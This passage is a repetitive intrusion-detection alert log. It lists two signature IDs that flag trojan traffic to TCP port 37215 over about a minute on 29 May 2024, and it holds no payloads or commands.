                SID:2835222
                Source Port:45186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644826
                SID:2829579
                Source Port:42492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262118
                SID:2835222
                Source Port:46030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075428
                SID:2829579
                Source Port:56202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905052
                SID:2829579
                Source Port:34266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374159
                SID:2835222
                Source Port:37484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436694
                SID:2835222
                Source Port:34732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271398
                SID:2835222
                Source Port:33346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173074
                SID:2835222
                Source Port:44850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931697
                SID:2835222
                Source Port:52986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.806317
                SID:2829579
                Source Port:36614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731862
                SID:2829579
                Source Port:48766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.169989
                SID:2835222
                Source Port:54930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881274
                SID:2835222
                Source Port:57036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438379
                SID:2835222
                Source Port:57258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664069
                SID:2835222
                Source Port:38322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779342
                SID:2835222
                Source Port:52798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223327
                SID:2829579
                Source Port:54222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381201
                SID:2829579
                Source Port:38974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522367
                SID:2835222
                Source Port:55014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385196
                SID:2835222
                Source Port:53554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.843188
                SID:2835222
                Source Port:53880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868186
                SID:2829579
                Source Port:40838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071287
                SID:2829579
                Source Port:38612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556216
                SID:2835222
                Source Port:36226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716116
                SID:2835222
                Source Port:44818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463195
                SID:2829579
                Source Port:39720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927727
                SID:2835222
                Source Port:49364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526079
                SID:2829579
                Source Port:52236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.703886
                SID:2835222
                Source Port:57984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664055
                SID:2835222
                Source Port:47322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979626
                SID:2835222
                Source Port:36132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160043
                SID:2829579
                Source Port:36524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653498
                SID:2835222
                Source Port:55212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763487
                SID:2835222
                Source Port:48366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575001
                SID:2829579
                Source Port:60314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238881
                SID:2829579
                Source Port:56542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419313
                SID:2829579
                Source Port:36222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810367
                SID:2829579
                Source Port:56468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817220
                SID:2835222
                Source Port:33192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025319
                SID:2835222
                Source Port:35108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.119360
                SID:2835222
                Source Port:40536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445447
                SID:2829579
                Source Port:57996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448988
                SID:2835222
                Source Port:51444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228450
                SID:2829579
                Source Port:48486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660272
                SID:2835222
                Source Port:32964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512562
                SID:2829579
                Source Port:47634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174811
                SID:2829579
                Source Port:43560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.288960
                SID:2835222
                Source Port:37716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844573
                SID:2829579
                Source Port:35430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984761
                SID:2829579
                Source Port:34090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509754
                SID:2829579
                Source Port:40132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653086
                SID:2835222
                Source Port:58690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039353
                SID:2829579
                Source Port:59528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.821500
                SID:2835222
                Source Port:45356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639822
                SID:2835222
                Source Port:40010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620685
                SID:2835222
                Source Port:40908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572404
                SID:2829579
                Source Port:48296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667986
                SID:2835222
                Source Port:60316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728331
                SID:2835222
                Source Port:35408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788378
                SID:2829579
                Source Port:51310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841797
                SID:2835222
                Source Port:47978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667372
                SID:2835222
                Source Port:41856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.802765
                SID:2829579
                Source Port:32934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711349
                SID:2829579
                Source Port:55194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429667
                SID:2829579
                Source Port:47996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335536
                SID:2829579
                Source Port:45266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236143
                SID:2829579
                Source Port:57466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276163
                SID:2835222
                Source Port:34282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282862
                SID:2835222
                Source Port:39064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292593
                SID:2829579
                Source Port:42902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944742
                SID:2829579
                Source Port:33480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.889894
                SID:2835222
                Source Port:33026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807459
                SID:2829579
                Source Port:56410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.359882
                SID:2829579
                Source Port:33788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791033
                SID:2829579
                Source Port:37112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844734
                SID:2829579
                Source Port:60210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681891
                SID:2829579
                Source Port:52952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038207
                SID:2835222
                Source Port:58250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561980
                SID:2829579
                Source Port:33426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421098
                SID:2829579
                Source Port:50984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087310
                SID:2829579
                Source Port:48342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224713
                SID:2835222
                Source Port:57998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582950
                SID:2835222
                Source Port:40766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070412
                SID:2829579
                Source Port:46182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796089
                SID:2829579
                Source Port:37228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.674910
                SID:2829579
                Source Port:49600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763630
                SID:2829579
                Source Port:46932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175250
                SID:2835222
                Source Port:55206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837749
                SID:2829579
                Source Port:38886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271675
                SID:2829579
                Source Port:38228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335945
                SID:2835222
                Source Port:57174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468699
                SID:2829579
                Source Port:54598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968661
                SID:2835222
                Source Port:45276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895887
                SID:2835222
                Source Port:51338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798720
                SID:2829579
                Source Port:60328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010072
                SID:2835222
                Source Port:44054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.441217
                SID:2835222
                Source Port:39600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.458641
                SID:2829579
                Source Port:34420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858126
                SID:2829579
                Source Port:38144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763304
                SID:2829579
                Source Port:59938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320618
                SID:2829579
                Source Port:39034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.843057
                SID:2835222
                Source Port:39010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897119
                SID:2835222
                Source Port:39304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948308
                SID:2829579
                Source Port:49658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517866
                SID:2829579
                Source Port:55244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461492
                SID:2829579
                Source Port:45540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870225
                SID:2835222
                Source Port:45896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817982
                SID:2829579
                Source Port:48210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845236
                SID:2829579
                Source Port:52690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.562290
                SID:2835222
                Source Port:49174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221209
                SID:2829579
                Source Port:39160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583665
                SID:2835222
                Source Port:56084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277095
                SID:2829579
                Source Port:52668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734769
                SID:2835222
                Source Port:49784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675081
                SID:2829579
                Source Port:43952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688251
                SID:2829579
                Source Port:34358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174989
                SID:2835222
                Source Port:36624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.980693
                SID:2835222
                Source Port:36092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779433
                SID:2835222
                Source Port:41910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381665
                SID:2835222
                Source Port:36716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075249
                SID:2829579
                Source Port:47078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870355
                SID:2829579
                Source Port:48512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972327
                SID:2835222
                Source Port:51596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009923
                SID:2835222
                Source Port:47150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.441145
                SID:2829579
                Source Port:40118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178923
                SID:2835222
                Source Port:53104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364280
                SID:2829579
                Source Port:33554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287212
                SID:2835222
                Source Port:41490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330136
                SID:2835222
                Source Port:48810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.723631
                SID:2829579
                Source Port:54736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572365
                SID:2829579
                Source Port:45014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897261
                SID:2835222
                Source Port:40954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281967
                SID:2829579
                Source Port:48404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654120
                SID:2829579
                Source Port:46692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162652
                SID:2829579
                Source Port:45886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550589
                SID:2835222
                Source Port:34060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227701
                SID:2829579
                Source Port:59990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032924
                SID:2829579
                Source Port:55040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024678
                SID:2835222
                Source Port:40160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.104856
                SID:2835222
                Source Port:36310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702077
                SID:2829579
                Source Port:54848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966282
                SID:2829579
                Source Port:55402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264703
                SID:2829579
                Source Port:46836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032309
                SID:2829579
                Source Port:50802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026421
                SID:2829579
                Source Port:41150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967031
                SID:2829579
                Source Port:48860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226165
                SID:2835222
                Source Port:45964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786744
                SID:2829579
                Source Port:55008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.692281
                SID:2835222
                Source Port:54930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276494
                SID:2835222
                Source Port:43910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946287
                SID:2829579
                Source Port:56520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860231
                SID:2829579
                Source Port:38500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.864491
                SID:2829579
                Source Port:33158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172863
                SID:2829579
                Source Port:36338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170351
                SID:2829579
                Source Port:40680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665347
                SID:2829579
                Source Port:51262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784767
                SID:2829579
                Source Port:51304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857285
                SID:2835222
                Source Port:43040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261521
                SID:2835222
                Source Port:51310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.980920
                SID:2835222
                Source Port:45712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779612
                SID:2835222
                Source Port:57986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833410
                SID:2835222
                Source Port:44910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681840
                SID:2829579
                Source Port:37316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947706
                SID:2835222
                Source Port:40722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617609
                SID:2835222
                Source Port:42744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009465
                SID:2829579
                Source Port:36404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861983
                SID:2835222
                Source Port:39368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987868
                SID:2829579
                Source Port:51958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899343
                SID:2835222
                Source Port:48956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.843240
                SID:2829579
                Source Port:40224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810175
                SID:2835222
                Source Port:50350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136157
                SID:2829579
                Source Port:40964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362658
                SID:2835222
                Source Port:36420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665171
                SID:2829579
                Source Port:34860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727326
                SID:2829579
                Source Port:49926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.100121
                SID:2835222
                Source Port:53570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556651
                SID:2829579
                Source Port:58144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666989
                SID:2829579
                Source Port:52818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964743
                SID:2835222
                Source Port:60956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175708
                SID:2835222
                Source Port:50974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781918
                SID:2835222
                Source Port:35362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140849
                SID:2835222
                Source Port:47038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318815
                SID:2829579
                Source Port:44708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782977
                SID:2829579
                Source Port:59766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766227
                SID:2835222
                Source Port:42212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990655
                SID:2835222
                Source Port:60446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501080
                SID:2829579
                Source Port:40610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984739
                SID:2835222
                Source Port:57542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.689106
                SID:2835222
                Source Port:42042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.040704
                SID:2835222
                Source Port:42538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791709
                SID:2835222
                Source Port:37048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618694
                SID:2835222
                Source Port:53612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207590
                SID:2835222
                Source Port:56344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662400
                SID:2835222
                Source Port:41914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809433
                SID:2829579
                Source Port:43380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467072
                SID:2829579
                Source Port:35530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558277
                SID:2829579
                Source Port:35554
                Destination Port:37215
